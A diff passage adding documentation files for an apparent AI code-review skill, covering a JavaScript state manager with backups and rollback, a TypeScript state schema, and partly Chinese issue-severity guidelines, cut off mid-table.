.claude/skills/review-code/phases/state-manager.md
Normal file
@@ -0,0 +1,752 @@
|
||||
# State Manager
|
||||
|
||||
Centralized state management module for Code Review workflow. Provides atomic operations, automatic backups, validation, and rollback capabilities.
|
||||
|
||||
## Overview
|
||||
|
||||
This module solves the fragile state management problem by providing:
|
||||
- **Atomic updates** - Write to temp file, then rename (prevents corruption)
|
||||
- **Automatic backups** - Every update creates a backup first
|
||||
- **Rollback capability** - Restore from backup on failure
|
||||
- **Schema validation** - Ensure state structure integrity
|
||||
- **Change history** - Track all state modifications
|
||||
|
||||
## File Structure
|
||||
|
||||
```
|
||||
{workDir}/
|
||||
state.json # Current state
|
||||
state.backup.json # Latest backup
|
||||
state-history.json # Change history log
|
||||
```
|
||||
|
||||
## API Reference
|
||||
|
||||
### initState(workDir)
|
||||
|
||||
Initialize a new state file with default values.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Initialize state file with default structure
|
||||
* @param {string} workDir - Working directory path
|
||||
* @returns {object} - Initial state object
|
||||
*/
|
||||
/**
 * Create a fresh state file (plus history log) with the default structure
 * for a new review session.
 * @param {string} workDir - Working directory path
 * @returns {object} - Initial state object
 */
function initState(workDir) {
  const now = new Date().toISOString();

  // One empty findings bucket per review dimension.
  const emptyFindings = {};
  for (const dim of ['correctness', 'readability', 'performance', 'security', 'testing', 'architecture']) {
    emptyFindings[dim] = [];
  }

  const initialState = {
    status: 'pending',
    started_at: now,
    updated_at: now,
    context: null,
    scan_completed: false,
    scan_summary: null,
    reviewed_dimensions: [],
    current_dimension: null,
    findings: emptyFindings,
    report_generated: false,
    report_path: null,
    current_action: null,
    completed_actions: [],
    errors: [],
    error_count: 0,
    summary: null
  };

  // Persist the state file.
  const statePath = `${workDir}/state.json`;
  Write(statePath, JSON.stringify(initialState, null, 2));

  // Start the change-history log with a single 'init' entry.
  Write(`${workDir}/state-history.json`, JSON.stringify({
    entries: [{
      timestamp: now,
      action: 'init',
      changes: { type: 'initialize', status: 'pending' }
    }]
  }, null, 2));

  console.log(`[StateManager] Initialized state at ${statePath}`);
  return initialState;
}
|
||||
```
|
||||
|
||||
### getState(workDir)
|
||||
|
||||
Read and parse current state from file.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Read current state from file
|
||||
* @param {string} workDir - Working directory path
|
||||
* @returns {object|null} - Current state or null if not found
|
||||
*/
|
||||
/**
 * Read and parse the current state from disk.
 * @param {string} workDir - Working directory path
 * @returns {object|null} - Current state, or null when missing/unreadable
 */
function getState(workDir) {
  try {
    const state = JSON.parse(Read(`${workDir}/state.json`));

    // Surface (but do not reject on) structural validation warnings.
    const { valid, warnings } = validateState(state);
    if (!valid) {
      console.warn(`[StateManager] State validation warnings: ${warnings.join(', ')}`);
    }

    return state;
  } catch (error) {
    // Missing file and parse errors both land here; callers treat null as
    // "no usable state".
    console.error(`[StateManager] Failed to read state: ${error.message}`);
    return null;
  }
}
|
||||
```
|
||||
|
||||
### updateState(workDir, updates)
|
||||
|
||||
Safely update state with atomic write and automatic backup.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Safely update state with atomic write
|
||||
* @param {string} workDir - Working directory path
|
||||
* @param {object} updates - Partial state updates to apply
|
||||
* @returns {object} - Updated state object
|
||||
* @throws {Error} - If update fails (automatically rolls back)
|
||||
*/
|
||||
function updateState(workDir, updates) {
  const statePath = `${workDir}/state.json`;
  const tempPath = `${workDir}/state.tmp.json`;
  const backupPath = `${workDir}/state.backup.json`;
  const historyPath = `${workDir}/state-history.json`;

  // Step 1: Read current state; fail loudly if it is missing or corrupt,
  // since merging into a broken base would compound the damage.
  let currentState;
  try {
    currentState = JSON.parse(Read(statePath));
  } catch (error) {
    throw new Error(`Cannot read current state: ${error.message}`);
  }

  // Step 2: Create backup before any modification (this is the file that
  // restoreState() reads by default).
  try {
    Write(backupPath, JSON.stringify(currentState, null, 2));
  } catch (error) {
    throw new Error(`Cannot create backup: ${error.message}`);
  }

  // Step 3: Merge updates; updated_at is always stamped last so it cannot
  // be overridden by the caller's updates.
  const now = new Date().toISOString();
  const newState = deepMerge(currentState, {
    ...updates,
    updated_at: now
  });

  // Step 4: Validate new state.
  // NOTE(review): `!validation.valid && validation.errors.length > 0` is
  // redundant — valid is defined as errors.length === 0 — but harmless.
  const validation = validateState(newState);
  if (!validation.valid && validation.errors.length > 0) {
    throw new Error(`Invalid state after update: ${validation.errors.join(', ')}`);
  }

  // Step 5: Write to temp file first (atomic preparation)
  try {
    Write(tempPath, JSON.stringify(newState, null, 2));
  } catch (error) {
    throw new Error(`Cannot write temp state: ${error.message}`);
  }

  // Step 6: "Atomic rename" (replace original with temp).
  // NOTE(review): this is a read-then-write, NOT a real filesystem rename,
  // so a crash between the two operations can still leave a torn state
  // file — the backup from Step 2 is the actual safety net. Confirm whether
  // the Write tool offers a true atomic rename.
  try {
    // Read temp and write to original (simulating atomic rename)
    const tempContent = Read(tempPath);
    Write(statePath, tempContent);

    // Clean up temp file
    Bash(`rm -f "${tempPath}"`);
  } catch (error) {
    // Rollback: restore from backup
    console.error(`[StateManager] Update failed, rolling back: ${error.message}`);
    try {
      const backup = Read(backupPath);
      Write(statePath, backup);
    } catch (rollbackError) {
      throw new Error(`Critical: Update failed and rollback failed: ${rollbackError.message}`);
    }
    throw new Error(`Update failed, rolled back: ${error.message}`);
  }

  // Step 7: Record in history (best-effort; never blocks the update).
  try {
    let history = { entries: [] };
    try {
      history = JSON.parse(Read(historyPath));
    } catch (e) {
      // History file may not exist, start fresh
    }

    history.entries.push({
      timestamp: now,
      action: 'update',
      changes: summarizeChanges(currentState, newState, updates)
    });

    // Keep only last 100 entries to bound the log's size.
    if (history.entries.length > 100) {
      history.entries = history.entries.slice(-100);
    }

    Write(historyPath, JSON.stringify(history, null, 2));
  } catch (error) {
    // History logging failure is non-critical
    console.warn(`[StateManager] Failed to log history: ${error.message}`);
  }

  console.log(`[StateManager] State updated successfully`);
  return newState;
}
|
||||
|
||||
/**
|
||||
* Deep merge helper - merges nested objects
|
||||
*/
|
||||
/**
 * Recursively merge `source` into a shallow copy of `target`.
 * - null/undefined in source overwrite the target value
 * - arrays in source replace (never concatenate with) the target value
 * - plain objects merge key-by-key
 * Fix: a source object now only merges into a target value that is itself a
 * plain object. Previously `typeof target[key] === 'object'` also matched
 * arrays (and null), so merging an object over an array spread the array's
 * indices into an index-keyed hybrid object; such targets are now replaced.
 * @param {object} target - Base object (not mutated)
 * @param {object} source - Updates to apply
 * @returns {object} - New merged object
 */
function deepMerge(target, source) {
  const result = { ...target };

  for (const key of Object.keys(source)) {
    const value = source[key];
    if (value === null || value === undefined) {
      result[key] = value;
    } else if (Array.isArray(value)) {
      result[key] = value;
    } else if (
      typeof value === 'object' &&
      typeof target[key] === 'object' &&
      target[key] !== null &&
      !Array.isArray(target[key])
    ) {
      result[key] = deepMerge(target[key], value);
    } else {
      result[key] = value;
    }
  }

  return result;
}
|
||||
|
||||
/**
|
||||
* Summarize changes for history logging
|
||||
*/
|
||||
/**
 * Produce a compact change summary for the history log: one entry per updated
 * key whose serialized value actually changed. Object values are abbreviated
 * to '[object]' to keep the log small; the 'updated_at' timestamp churn is
 * skipped entirely.
 * @param {object} oldState - State before the update
 * @param {object} newState - State after the update
 * @param {object} updates - The update payload that was applied
 * @returns {object} - Map of key -> { from, to }
 */
function summarizeChanges(oldState, newState, updates) {
  const abbreviate = (v) => (typeof v === 'object' ? '[object]' : v);
  const changes = {};

  Object.keys(updates)
    .filter((key) => key !== 'updated_at')
    .forEach((key) => {
      const before = oldState[key];
      const after = newState[key];
      // JSON comparison catches nested changes without deep-equality code.
      if (JSON.stringify(before) !== JSON.stringify(after)) {
        changes[key] = { from: abbreviate(before), to: abbreviate(after) };
      }
    });

  return changes;
}
|
||||
```
|
||||
|
||||
### validateState(state)
|
||||
|
||||
Validate state structure against schema.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Validate state structure
|
||||
* @param {object} state - State object to validate
|
||||
* @returns {object} - { valid: boolean, errors: string[], warnings: string[] }
|
||||
*/
|
||||
/**
 * Validate the review-state structure.
 * Hard failures go into `errors` and make the state invalid; `warnings` are
 * advisory and never block an update.
 * @param {object} state - State object to validate
 * @returns {object} - { valid: boolean, errors: string[], warnings: string[] }
 */
function validateState(state) {
  const errors = [];
  const warnings = [];

  // Required top-level fields (hard errors).
  for (const field of ['status', 'started_at', 'updated_at']) {
    if (state[field] === undefined) {
      errors.push(`Missing required field: ${field}`);
    }
  }

  // Status must be one of the known lifecycle values.
  const validStatuses = ['pending', 'running', 'completed', 'failed', 'user_exit'];
  if (state.status && !validStatuses.includes(state.status)) {
    errors.push(`Invalid status: ${state.status}. Must be one of: ${validStatuses.join(', ')}`);
  }

  // Timestamps should be ISO-8601 strings (warning only).
  for (const field of ['started_at', 'updated_at', 'completed_at']) {
    if (state[field] && !isValidISOTimestamp(state[field])) {
      warnings.push(`Invalid timestamp format for ${field}`);
    }
  }

  // Each review dimension must map to an array of findings.
  if (state.findings) {
    const expectedDimensions = ['correctness', 'readability', 'performance', 'security', 'testing', 'architecture'];
    for (const dim of expectedDimensions) {
      if (!Array.isArray(state.findings[dim])) {
        warnings.push(`findings.${dim} should be an array`);
      }
    }
  }

  // Context, once collected, should carry the core descriptor fields.
  if (state.context !== null && state.context !== undefined) {
    for (const field of ['target_path', 'files', 'language', 'total_lines', 'file_count']) {
      if (state.context[field] === undefined) {
        warnings.push(`context.${field} is missing`);
      }
    }
  }

  if (typeof state.error_count !== 'number') {
    warnings.push('error_count should be a number');
  }

  // List-typed fields must actually be arrays (hard error).
  for (const field of ['reviewed_dimensions', 'completed_actions', 'errors']) {
    if (state[field] !== undefined && !Array.isArray(state[field])) {
      errors.push(`${field} must be an array`);
    }
  }

  return {
    valid: errors.length === 0,
    errors,
    warnings
  };
}

/**
 * Check whether a value is a parseable ISO timestamp string.
 * The 'T' requirement rejects date-only strings like '2024-01-01'.
 * @param {*} str - Candidate value
 * @returns {boolean}
 */
function isValidISOTimestamp(str) {
  return typeof str === 'string' && str.includes('T') && !Number.isNaN(new Date(str).getTime());
}
|
||||
```
|
||||
|
||||
### backupState(workDir)
|
||||
|
||||
Create a manual backup of current state.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Create a manual backup of current state
|
||||
* @param {string} workDir - Working directory path
|
||||
* @param {string} [suffix] - Optional suffix for backup file name
|
||||
* @returns {string} - Backup file path
|
||||
*/
|
||||
/**
 * Write a manual, named backup copy of the current state file.
 * @param {string} workDir - Working directory path
 * @param {string} [suffix] - Optional suffix for the backup file name;
 *                            defaults to a filesystem-safe timestamp
 * @returns {string} - Backup file path
 * @throws {Error} - When the state cannot be read or the backup written
 */
function backupState(workDir, suffix = null) {
  // Colons and dots in ISO timestamps are unsafe in file names; dashes work.
  const stamp = suffix || new Date().toISOString().replace(/[:.]/g, '-');
  const backupPath = `${workDir}/state.backup.${stamp}.json`;

  try {
    Write(backupPath, Read(`${workDir}/state.json`));
    console.log(`[StateManager] Backup created: ${backupPath}`);
    return backupPath;
  } catch (error) {
    throw new Error(`Failed to create backup: ${error.message}`);
  }
}
|
||||
```
|
||||
|
||||
### restoreState(workDir, backupPath)
|
||||
|
||||
Restore state from a backup file.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Restore state from a backup file
|
||||
* @param {string} workDir - Working directory path
|
||||
* @param {string} [backupPath] - Path to backup file (default: latest backup)
|
||||
* @returns {object} - Restored state object
|
||||
*/
|
||||
/**
 * Restore state from a backup file.
 * Fix: the local variable holding the parsed backup was previously named
 * `backupState`, shadowing the sibling backupState() API function and making
 * it uncallable from inside this function; renamed to `restored`.
 * @param {string} workDir - Working directory path
 * @param {string} [backupPath] - Path to backup file (default: latest backup)
 * @returns {object} - Restored state object
 * @throws {Error} - When the backup is missing, unparseable, or invalid
 */
function restoreState(workDir, backupPath = null) {
  const statePath = `${workDir}/state.json`;
  const historyPath = `${workDir}/state-history.json`;
  const sourcePath = backupPath || `${workDir}/state.backup.json`;

  try {
    // Read and parse the backup.
    const restored = JSON.parse(Read(sourcePath));

    // Never restore a structurally invalid backup.
    const validation = validateState(restored);
    if (!validation.valid) {
      throw new Error(`Backup state is invalid: ${validation.errors.join(', ')}`);
    }

    // Keep a safety copy of the current state before overwriting it.
    try {
      Write(`${workDir}/state.pre-restore.json`, Read(statePath));
    } catch (e) {
      // Current state may not exist, that's okay
    }

    // Stamp the restore time and write the backup as the live state.
    const now = new Date().toISOString();
    restored.updated_at = now;
    Write(statePath, JSON.stringify(restored, null, 2));

    // Record the restore in the history log (best-effort).
    try {
      let history = { entries: [] };
      try {
        history = JSON.parse(Read(historyPath));
      } catch (e) {}

      history.entries.push({
        timestamp: now,
        action: 'restore',
        changes: { source: sourcePath }
      });

      Write(historyPath, JSON.stringify(history, null, 2));
    } catch (e) {
      console.warn(`[StateManager] Failed to log restore to history`);
    }

    console.log(`[StateManager] State restored from ${sourcePath}`);
    return restored;
  } catch (error) {
    throw new Error(`Failed to restore state: ${error.message}`);
  }
}
|
||||
```
|
||||
|
||||
## Convenience Functions
|
||||
|
||||
### getNextDimension(state)
|
||||
|
||||
Get the next dimension to review based on current state.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Get next dimension to review
|
||||
* @param {object} state - Current state
|
||||
* @returns {string|null} - Next dimension or null if all reviewed
|
||||
*/
|
||||
/**
 * Get the next dimension to review, in the fixed priority order.
 * @param {object} state - Current state
 * @returns {string|null} - Next unreviewed dimension, or null when all done
 */
function getNextDimension(state) {
  const order = ['correctness', 'security', 'performance', 'readability', 'testing', 'architecture'];
  const done = new Set(state.reviewed_dimensions || []);
  return order.find((dim) => !done.has(dim)) ?? null;
}
|
||||
```
|
||||
|
||||
### addFinding(workDir, finding)
|
||||
|
||||
Add a new finding to the state.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Add a finding to the appropriate dimension
|
||||
* @param {string} workDir - Working directory path
|
||||
* @param {object} finding - Finding object (must include dimension field)
|
||||
* @returns {object} - Updated state
|
||||
*/
|
||||
/**
 * Append a finding to its dimension's list, generating a sequential prefixed
 * ID (e.g. SEC-001) when the finding does not already carry one.
 * @param {string} workDir - Working directory path
 * @param {object} finding - Finding object (must include dimension field)
 * @returns {object} - Updated state
 * @throws {Error} - When the finding has no dimension field
 */
function addFinding(workDir, finding) {
  const { dimension } = finding;
  if (!dimension) {
    throw new Error('Finding must have a dimension field');
  }

  const state = getState(workDir);
  const existing = state.findings[dimension] || [];

  // Generate an ID if the caller did not supply one.
  if (!finding.id) {
    const prefixes = {
      correctness: 'CORR',
      readability: 'READ',
      performance: 'PERF',
      security: 'SEC',
      testing: 'TEST',
      architecture: 'ARCH'
    };
    const seq = String(existing.length + 1).padStart(3, '0');
    finding.id = `${prefixes[dimension] || 'MISC'}-${seq}`;
  }

  return updateState(workDir, {
    findings: {
      ...state.findings,
      [dimension]: [...existing, finding]
    }
  });
}
|
||||
```
|
||||
|
||||
### markDimensionComplete(workDir, dimension)
|
||||
|
||||
Mark a dimension as reviewed.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Mark a dimension as reviewed
|
||||
* @param {string} workDir - Working directory path
|
||||
* @param {string} dimension - Dimension name
|
||||
* @returns {object} - Updated state
|
||||
*/
|
||||
/**
 * Mark a dimension as reviewed. Idempotent: re-marking an already-reviewed
 * dimension logs a warning and returns the state unchanged.
 * @param {string} workDir - Working directory path
 * @param {string} dimension - Dimension name
 * @returns {object} - Updated (or unchanged) state
 */
function markDimensionComplete(workDir, dimension) {
  const state = getState(workDir);
  const reviewed = state.reviewed_dimensions || [];

  if (reviewed.includes(dimension)) {
    console.warn(`[StateManager] Dimension ${dimension} already marked as reviewed`);
    return state;
  }

  return updateState(workDir, {
    reviewed_dimensions: reviewed.concat(dimension),
    current_dimension: null
  });
}
|
||||
```
|
||||
|
||||
### recordError(workDir, action, message)
|
||||
|
||||
Record an error in state.
|
||||
|
||||
```javascript
|
||||
/**
 * Record an execution error.
 *
 * Appends the error to `state.errors`, increments `error_count`, and —
 * when the accumulated count reaches the failure threshold — flips
 * `status` to 'failed' in the SAME update, so the transition is atomic:
 * one write, one backup, one history entry (the previous implementation
 * issued a second, separate `updateState` call for the status change).
 *
 * @param {string} workDir - Working directory path
 * @param {string} action - Action that failed
 * @param {string} message - Error message
 * @returns {object} - Updated state
 */
function recordError(workDir, action, message) {
  const MAX_ERRORS = 3; // auto-fail threshold (see Error Recovery Strategies)

  const state = getState(workDir);
  const errors = state.errors || [];
  const errorCount = (state.error_count || 0) + 1;

  const newError = {
    action,
    message,
    timestamp: new Date().toISOString()
  };

  const updates = {
    errors: [...errors, newError],
    error_count: errorCount
  };

  // Auto-fail once the threshold is reached, merged into the same
  // update to avoid a second (non-atomic) state write.
  if (errorCount >= MAX_ERRORS) {
    updates.status = 'failed';
  }

  return updateState(workDir, updates);
}
|
||||
```
|
||||
|
||||
## Usage Examples
|
||||
|
||||
### Initialize and Run Review
|
||||
|
||||
```javascript
|
||||
// Initialize new review session
|
||||
const workDir = '/path/to/review-session';
|
||||
const state = initState(workDir);
|
||||
|
||||
// Update status to running
|
||||
updateState(workDir, { status: 'running' });
|
||||
|
||||
// After collecting context
|
||||
updateState(workDir, {
|
||||
context: {
|
||||
target_path: '/src/auth',
|
||||
files: ['auth.ts', 'login.ts'],
|
||||
language: 'typescript',
|
||||
total_lines: 500,
|
||||
file_count: 2
|
||||
}
|
||||
});
|
||||
|
||||
// After completing quick scan
|
||||
updateState(workDir, {
|
||||
scan_completed: true,
|
||||
scan_summary: {
|
||||
risk_areas: [{ file: 'auth.ts', reason: 'Complex logic', priority: 'high' }],
|
||||
complexity_score: 7.5,
|
||||
quick_issues: []
|
||||
}
|
||||
});
|
||||
```
|
||||
|
||||
### Add Findings During Review
|
||||
|
||||
```javascript
|
||||
// Add a security finding
|
||||
addFinding(workDir, {
|
||||
dimension: 'security',
|
||||
severity: 'high',
|
||||
category: 'injection',
|
||||
file: 'auth.ts',
|
||||
line: 45,
|
||||
description: 'SQL injection vulnerability',
|
||||
recommendation: 'Use parameterized queries'
|
||||
});
|
||||
|
||||
// Mark dimension complete
|
||||
markDimensionComplete(workDir, 'security');
|
||||
```
|
||||
|
||||
### Error Handling with Rollback
|
||||
|
||||
```javascript
|
||||
try {
|
||||
updateState(workDir, {
|
||||
status: 'running',
|
||||
current_action: 'deep-review'
|
||||
});
|
||||
|
||||
// ... do review work ...
|
||||
|
||||
} catch (error) {
|
||||
// Record error
|
||||
recordError(workDir, 'deep-review', error.message);
|
||||
|
||||
// If needed, restore from backup
|
||||
restoreState(workDir);
|
||||
}
|
||||
```
|
||||
|
||||
### Check Review Progress
|
||||
|
||||
```javascript
|
||||
const state = getState(workDir);
|
||||
const nextDim = getNextDimension(state);
|
||||
|
||||
if (nextDim) {
|
||||
console.log(`Next dimension to review: ${nextDim}`);
|
||||
updateState(workDir, { current_dimension: nextDim });
|
||||
} else {
|
||||
console.log('All dimensions reviewed');
|
||||
}
|
||||
```
|
||||
|
||||
## Integration with Orchestrator
|
||||
|
||||
Update the orchestrator to use StateManager:
|
||||
|
||||
```javascript
|
||||
// In orchestrator.md - Replace direct state operations with StateManager calls
|
||||
|
||||
// OLD:
|
||||
const state = JSON.parse(Read(`${workDir}/state.json`));
|
||||
|
||||
// NEW:
|
||||
const state = getState(workDir);
|
||||
|
||||
// OLD:
|
||||
function updateState(updates) {
|
||||
const state = JSON.parse(Read(`${workDir}/state.json`));
|
||||
const newState = { ...state, ...updates, updated_at: new Date().toISOString() };
|
||||
Write(`${workDir}/state.json`, JSON.stringify(newState, null, 2));
|
||||
return newState;
|
||||
}
|
||||
|
||||
// NEW:
|
||||
// Import from state-manager.md
|
||||
// updateState(workDir, updates) - handles atomic write, backup, validation
|
||||
|
||||
// Error handling - OLD:
|
||||
updateState({
|
||||
errors: [...(state.errors || []), { action: actionId, message: error.message, timestamp: new Date().toISOString() }],
|
||||
error_count: (state.error_count || 0) + 1
|
||||
});
|
||||
|
||||
// Error handling - NEW:
|
||||
recordError(workDir, actionId, error.message);
|
||||
```
|
||||
|
||||
## State History Format
|
||||
|
||||
The `state-history.json` file tracks all state changes:
|
||||
|
||||
```json
|
||||
{
|
||||
"entries": [
|
||||
{
|
||||
"timestamp": "2024-01-01T10:00:00.000Z",
|
||||
"action": "init",
|
||||
"changes": { "type": "initialize", "status": "pending" }
|
||||
},
|
||||
{
|
||||
"timestamp": "2024-01-01T10:01:00.000Z",
|
||||
"action": "update",
|
||||
"changes": {
|
||||
"status": { "from": "pending", "to": "running" },
|
||||
"current_action": { "from": null, "to": "action-collect-context" }
|
||||
}
|
||||
},
|
||||
{
|
||||
"timestamp": "2024-01-01T10:05:00.000Z",
|
||||
"action": "restore",
|
||||
"changes": { "source": "/path/state.backup.json" }
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
## Error Recovery Strategies
|
||||
|
||||
| Scenario | Strategy | Function |
|
||||
|----------|----------|----------|
|
||||
| State file corrupted | Restore from backup | `restoreState(workDir)` |
|
||||
| Invalid state after update | Auto-rollback (built-in) | N/A (automatic) |
|
||||
| Multiple errors | Auto-fail after 3 | `recordError()` |
|
||||
| Need to retry from checkpoint | Restore specific backup | `restoreState(workDir, backupPath)` |
|
||||
| Review interrupted | Resume from saved state | `getState(workDir)` |
|
||||
|
||||
## Best Practices
|
||||
|
||||
1. **Always use `updateState()`** - Never write directly to state.json
|
||||
2. **Check validation warnings** - Warnings may indicate data issues
|
||||
3. **Use convenience functions** - `addFinding()`, `markDimensionComplete()`, etc.
|
||||
4. **Monitor history** - Check state-history.json for debugging
|
||||
5. **Create named backups** - Before major operations: `backupState(workDir, 'pre-deep-review')`
|
||||
174
.claude/skills/review-code/phases/state-schema.md
Normal file
@@ -0,0 +1,174 @@
|
||||
# State Schema
|
||||
|
||||
Code Review 状态结构定义。
|
||||
|
||||
## Schema Definition
|
||||
|
||||
```typescript
|
||||
interface ReviewState {
  // === Metadata ===
  status: 'pending' | 'running' | 'completed' | 'failed' | 'user_exit';
  started_at: string; // ISO timestamp
  updated_at: string; // ISO timestamp
  completed_at?: string; // ISO timestamp

  // === Review target ===
  context: {
    target_path: string; // Target path (file or directory)
    files: string[]; // Files awaiting review
    language: string; // Primary programming language
    framework?: string; // Framework (if any)
    total_lines: number; // Total lines of code
    file_count: number; // Number of files
  };

  // === Scan results ===
  scan_completed: boolean;
  scan_summary: {
    risk_areas: RiskArea[]; // High-risk areas
    complexity_score: number; // Complexity score
    quick_issues: QuickIssue[]; // Issues found during the quick scan
  };

  // === Review progress ===
  reviewed_dimensions: string[]; // Dimensions already reviewed
  current_dimension?: string; // Dimension currently under review

  // === Findings ===
  findings: {
    correctness: Finding[];
    readability: Finding[];
    performance: Finding[];
    security: Finding[];
    testing: Finding[];
    architecture: Finding[];
  };

  // === Report status ===
  report_generated: boolean;
  report_path?: string;

  // === Execution tracking ===
  current_action?: string;
  completed_actions: string[];
  errors: ExecutionError[];
  error_count: number;

  // === Statistics ===
  summary?: {
    total_issues: number;
    critical: number;
    high: number;
    medium: number;
    low: number;
    info: number;
    review_duration_ms: number;
  };
}

interface RiskArea {
  file: string;
  reason: string;
  priority: 'high' | 'medium' | 'low';
}

interface QuickIssue {
  type: string;
  file: string;
  line?: number;
  message: string;
}

interface Finding {
  id: string; // Unique identifier, e.g. "CORR-001"
  severity: 'critical' | 'high' | 'medium' | 'low' | 'info';
  dimension: string; // Dimension this finding belongs to
  category: string; // Issue category
  file: string; // File path
  line?: number; // Line number
  column?: number; // Column number
  code_snippet?: string; // Offending code snippet
  description: string; // Description of the issue
  recommendation: string; // Suggested fix
  fix_example?: string; // Example fix code
  references?: string[]; // Reference links
}

interface ExecutionError {
  action: string;
  message: string;
  timestamp: string;
}
|
||||
```
|
||||
|
||||
## Initial State
|
||||
|
||||
```json
|
||||
{
|
||||
"status": "pending",
|
||||
"started_at": "2024-01-01T00:00:00.000Z",
|
||||
"updated_at": "2024-01-01T00:00:00.000Z",
|
||||
"context": null,
|
||||
"scan_completed": false,
|
||||
"scan_summary": null,
|
||||
"reviewed_dimensions": [],
|
||||
"current_dimension": null,
|
||||
"findings": {
|
||||
"correctness": [],
|
||||
"readability": [],
|
||||
"performance": [],
|
||||
"security": [],
|
||||
"testing": [],
|
||||
"architecture": []
|
||||
},
|
||||
"report_generated": false,
|
||||
"report_path": null,
|
||||
"current_action": null,
|
||||
"completed_actions": [],
|
||||
"errors": [],
|
||||
"error_count": 0,
|
||||
"summary": null
|
||||
}
|
||||
```
|
||||
|
||||
## State Transitions
|
||||
|
||||
```mermaid
|
||||
stateDiagram-v2
|
||||
[*] --> pending: Initialize
|
||||
pending --> running: collect-context
|
||||
running --> running: quick-scan
|
||||
running --> running: deep-review (6x)
|
||||
running --> running: generate-report
|
||||
running --> completed: complete
|
||||
running --> failed: error_count >= 3
|
||||
running --> user_exit: User abort
|
||||
completed --> [*]
|
||||
failed --> [*]
|
||||
user_exit --> [*]
|
||||
```
|
||||
|
||||
## Dimension Review Order
|
||||
|
||||
1. **correctness** - 正确性(最高优先级)
|
||||
2. **security** - 安全性(关键)
|
||||
3. **performance** - 性能
|
||||
4. **readability** - 可读性
|
||||
5. **testing** - 测试覆盖
|
||||
6. **architecture** - 架构一致性
|
||||
|
||||
## Finding ID Format
|
||||
|
||||
```
|
||||
{DIMENSION_PREFIX}-{SEQUENCE}
|
||||
|
||||
Prefixes:
|
||||
- CORR: Correctness
|
||||
- READ: Readability
|
||||
- PERF: Performance
|
||||
- SEC: Security
|
||||
- TEST: Testing
|
||||
- ARCH: Architecture
|
||||
|
||||
Example: SEC-003 = Security issue #3
|
||||
```
|
||||
228
.claude/skills/review-code/specs/issue-classification.md
Normal file
@@ -0,0 +1,228 @@
|
||||
# Issue Classification
|
||||
|
||||
问题分类和严重程度标准。
|
||||
|
||||
## When to Use
|
||||
|
||||
| Phase | Usage | Section |
|
||||
|-------|-------|---------|
|
||||
| action-deep-review | 确定问题严重程度 | Severity Levels |
|
||||
| action-generate-report | 问题分类展示 | Category Mapping |
|
||||
|
||||
---
|
||||
|
||||
## Severity Levels
|
||||
|
||||
### Critical (严重) 🔴
|
||||
|
||||
**定义**: 必须在合并前修复的阻塞性问题
|
||||
|
||||
**标准**:
|
||||
- 安全漏洞 (可被利用)
|
||||
- 数据损坏或丢失风险
|
||||
- 系统崩溃风险
|
||||
- 生产环境重大故障
|
||||
|
||||
**示例**:
|
||||
- SQL/XSS/命令注入
|
||||
- 硬编码密钥泄露
|
||||
- 未捕获的异常导致崩溃
|
||||
- 数据库事务未正确处理
|
||||
|
||||
**响应**: 必须立即修复,阻塞合并
|
||||
|
||||
---
|
||||
|
||||
### High (高) 🟠
|
||||
|
||||
**定义**: 应在合并前修复的重要问题
|
||||
|
||||
**标准**:
|
||||
- 功能缺陷
|
||||
- 重要边界条件未处理
|
||||
- 性能严重退化
|
||||
- 资源泄漏
|
||||
|
||||
**示例**:
|
||||
- 核心业务逻辑错误
|
||||
- 内存泄漏
|
||||
- N+1 查询问题
|
||||
- 缺少必要的错误处理
|
||||
|
||||
**响应**: 强烈建议修复
|
||||
|
||||
---
|
||||
|
||||
### Medium (中) 🟡
|
||||
|
||||
**定义**: 建议修复的代码质量问题
|
||||
|
||||
**标准**:
|
||||
- 代码可维护性问题
|
||||
- 轻微性能问题
|
||||
- 测试覆盖不足
|
||||
- 不符合团队规范
|
||||
|
||||
**示例**:
|
||||
- 函数过长
|
||||
- 命名不清晰
|
||||
- 缺少注释
|
||||
- 代码重复
|
||||
|
||||
**响应**: 建议在后续迭代修复
|
||||
|
||||
---
|
||||
|
||||
### Low (低) 🔵
|
||||
|
||||
**定义**: 可选优化的问题
|
||||
|
||||
**标准**:
|
||||
- 风格问题
|
||||
- 微小优化
|
||||
- 可读性改进
|
||||
|
||||
**示例**:
|
||||
- 变量声明顺序
|
||||
- 额外的空行
|
||||
- 可以更简洁的写法
|
||||
|
||||
**响应**: 可根据团队偏好处理
|
||||
|
||||
---
|
||||
|
||||
### Info (信息) ⚪
|
||||
|
||||
**定义**: 信息性建议,非问题
|
||||
|
||||
**标准**:
|
||||
- 学习机会
|
||||
- 替代方案建议
|
||||
- 文档完善建议
|
||||
|
||||
**示例**:
|
||||
- "这里可以考虑使用新的 API"
|
||||
- "建议添加 JSDoc 注释"
|
||||
- "可以参考 xxx 模式"
|
||||
|
||||
**响应**: 仅供参考
|
||||
|
||||
---
|
||||
|
||||
## Category Mapping
|
||||
|
||||
### By Dimension
|
||||
|
||||
| Dimension | Common Categories |
|
||||
|-----------|-------------------|
|
||||
| Correctness | `null-check`, `boundary`, `error-handling`, `type-safety`, `logic-error` |
|
||||
| Security | `injection`, `xss`, `hardcoded-secret`, `auth`, `sensitive-data` |
|
||||
| Performance | `complexity`, `n+1-query`, `memory-leak`, `blocking-io`, `inefficient-algorithm` |
|
||||
| Readability | `naming`, `function-length`, `complexity`, `comments`, `duplication` |
|
||||
| Testing | `coverage`, `boundary-test`, `mock-abuse`, `test-isolation` |
|
||||
| Architecture | `layer-violation`, `circular-dependency`, `coupling`, `srp-violation` |
|
||||
|
||||
### Category Details
|
||||
|
||||
#### Correctness Categories
|
||||
|
||||
| Category | Description | Default Severity |
|
||||
|----------|-------------|------------------|
|
||||
| `null-check` | 缺少空值检查 | High |
|
||||
| `boundary` | 边界条件未处理 | High |
|
||||
| `error-handling` | 错误处理不当 | High |
|
||||
| `type-safety` | 类型安全问题 | Medium |
|
||||
| `logic-error` | 逻辑错误 | Critical/High |
|
||||
| `resource-leak` | 资源泄漏 | High |
|
||||
|
||||
#### Security Categories
|
||||
|
||||
| Category | Description | Default Severity |
|
||||
